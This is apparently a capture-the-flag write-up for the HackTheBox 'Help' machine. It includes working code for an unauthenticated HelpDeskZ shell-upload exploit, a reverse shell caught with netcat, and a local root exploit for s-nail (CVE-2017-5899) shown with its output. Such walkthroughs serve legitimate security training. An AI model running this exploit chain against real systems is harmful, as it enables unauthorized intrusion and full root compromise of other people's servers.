Enumeration
I started off with a quick Nmap scan on the target.
nmap -sSV -T4 10.10.10.121
Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-22 11:20 AEST
Nmap scan report for 10.10.10.121
Host is up (0.23s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
3000/tcp open http Node.js Express framework
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We can see that there is an Apache Service running on port 80. Port 3000 was slightly more interesting.
I began my enumeration by performing a quick directory enumeration on the service running at port 80.
root@kali:~/Desktop/HackTheBox/Help# gobuster -w /usr/share/wordlists/dirb/common.txt -u 10.10.10.121
=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.121/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirb/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
2019/05/22 11:43:36 Starting gobuster
=====================================================
/.htaccess (Status: 403)
/.hta (Status: 403)
/.htpasswd (Status: 403)
/index.html (Status: 200)
/javascript (Status: 301)
/server-status (Status: 403)
/support (Status: 301)
=====================================================
2019/05/22 11:45:38 Finished
=====================================================
Gobuster was able to discover “support” which redirected me to the HelpDeskZ application.
Exploitation
A quick google search on this application revealed this vulnerability which allows Arbitrary Shell Upload that can then be chained with a reverse shell. The exploit from the link above is missing a few characters (like colons). This has been fixed and can be seen below:
#!/usr/bin/python2
import hashlib
import time
import sys
import requests
import datetime
print 'Helpdeskz v1.0.2 - Unauthenticated shell upload exploit'
if len(sys.argv) < 3:
print "Usage: {} [baseUrl] [nameOfUploadedFile]".format(sys.argv[0])
sys.exit(1)
helpdeskzBaseUrl = sys.argv[1]
fileName = sys.argv[2]
r = requests.get(helpdeskzBaseUrl)
currentTime = int((datetime.datetime.strptime(r.headers['date'], '%a, %d %b %Y %H:%M:%S %Z') - datetime.datetime(1970,1,1)).total_seconds())
for x in range(0, 300):
plaintext = fileName + str(currentTime - x)
md5hash = hashlib.md5(plaintext).hexdigest()
url = helpdeskzBaseUrl+md5hash+'.php'
response = requests.head(url)
if response.status_code == 200:
print "found!"
print url
sys.exit(0)
else:
print url + ":404"
print "Sorry, I did not find anything"
Following the instructions, I navigated to the following link to upload my shell.
http://10.10.10.121/support/?v=submit_ticket&action=displayForm
I entered random data into the form and selected my shell (named baegmon.php) for the attachment upload. Upon submitting my form, I was shown an error that the file I uploaded is not allowed; however, this is actually not true and the warning can be ignored.
Before executing the exploit, there is one “gotcha”. The exploit requires you to specify the directory in which tickets are uploaded to. By digging through line 138 in submit_ticket_controller.php and line 18 in global.php we can piece together the ticket upload directory.
Line 138: $uploaddir = UPLOAD_DIR.'tickets/';
Line 018: define('UPLOAD_DIR', ROOTPATH . 'uploads/');
Result: http://host/support/uploads/tickets/
With the file uploaded, I ran the exploit and waited until it was able to successfully create my shell.
== Screen 1 ==
root@kali:~/Desktop/HackTheBox/Help# python exploit.py http://10.10.10.121/support/uploads/tickets/ baegmon.php
Helpdeskz v1.0.2 - Unauthenticated shell upload exploit
http://10.10.10.121/support/uploads/tickets/9031654835ec4a4f8350f29e90bc7223.php:404
http://10.10.10.121/support/uploads/tickets/46134c86a55e2ac1004127f1130ddcc7.php:404
http://10.10.10.121/support/uploads/tickets/63f9b3861085c30d310832a3bd86b4ad.php:404
http://10.10.10.121/support/uploads/tickets/9ed2211aa1cfcff9863d04a674a6ad90.php:404
http://10.10.10.121/support/uploads/tickets/fc556c71175dcdd2d934270edf0b4bee.php:404
http://10.10.10.121/support/uploads/tickets/fb194e523fd087dc42cbde5c8168fa46.php:404
== Screen 2 ==
root@kali:~/Desktop/HackTheBox/Help# nc -nvlp 8989
listening on [any] 8989 ...
connect to [10.10.15.176] from (UNKNOWN) [10.10.10.121] 37994
Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
09:16:49 up 14 min, 0 users, load average: 0.00, 0.01, 0.03
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)
/bin/sh: 0: can't access tty; job control turned off
$
With shell access on the system, I quickly used Python to upgrade my current shell into a basic bash shell and obtained the user flag.
$ python -c 'import pty; pty.spawn("/bin/bash")'
help@help:/$
help@help:/home$ cd /home/help && cat user.txt
cd /home/help && cat user.txt
bb8**************************6af
Privilege Escalation
I started off with some quick enumeration on the system. I started by looking for SUID/GUID binaries on the system and was able to discover an interesting binary.
help@help:/home/help$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
...
/usr/lib/s-nail/s-nail-privsep
...
I was also running enumeration scripts in the background. Linux Exploit Suggester was able to find the following:
help@help:/tmp$ ./les.sh
Available information:
Kernel version: 4.4.0
Architecture: x86_64
Distribution: ubuntu
Distribution version: 16.04.5
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS
Searching among:
71 kernel space exploits
39 user space exploits
Possible Exploits:
...
[+] [CVE-2017-5899] s-nail-privget
Details: https://www.openwall.com/lists/oss-security/2017/01/27/7
Tags: [ ubuntu=16.04 ],manjaro=16.10
Rank: 3
Download URL: https://www.openwall.com/lists/oss-security/2017/01/27/7/1
ext-url: https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2017-5899/exploit.sh
Comments: Distros use own versioning scheme. Manual verification needed.
...
The exploit makes use of a directory traversal vulnerability in the setuid root helper binary in S-nail to gain root privileges. Armed with this knowledge, I obtained the exploit and uploaded it to the system and triggered it.
help@help:/tmp$ ./exploit.sh
[~] Found privsep: /usr/lib/s-nail/s-nail-privsep
[.] Compiling /var/tmp/.snail.so.c ...
[.] Compiling /var/tmp/.sh.c ...
[.] Compiling /var/tmp/.privget.c ...
[.] Adding /var/tmp/.snail.so to /etc/ld.so.preload ...
[=] s-nail-privsep local root by @wapiflapi
[.] Started flood in /etc/ld.so.preload
[.] Started race with /usr/lib/s-nail/s-nail-privsep
[.] This could take a while...
[.] Race #1 of 1000 ...
This is a helper program of "s-nail" (in /usr/bin).
It is capable of gaining more privileges than "s-nail"
and will be used to create lock files.
It's sole purpose is outsourcing of high privileges into
fewest lines of code in order to reduce attack surface.
It cannot be run by itself.
-- snip --
[.] Race #306 of 1000 ...
This is a helper program of "s-nail" (in /usr/bin).
It is capable of gaining more privileges than "s-nail"
and will be used to create lock files.
It's sole purpose is outsourcing of high privileges into
fewest lines of code in order to reduce attack surface.
It cannot be run by itself.
[.] Race #307 of 1000 ...
[+] got root! /var/tmp/.sh (uid=0 gid=0)
[.] Cleaning up...
[+] Success:
-rwsr-xr-x 1 root root 6336 May 21 20:45 /var/tmp/.sh
[.] Launching root shell: /var/tmp/.sh
# whoami
root
With root privileges obtained, the only thing left was to obtain the flag!
# cat /root/root.txt
b7f***************************b98
#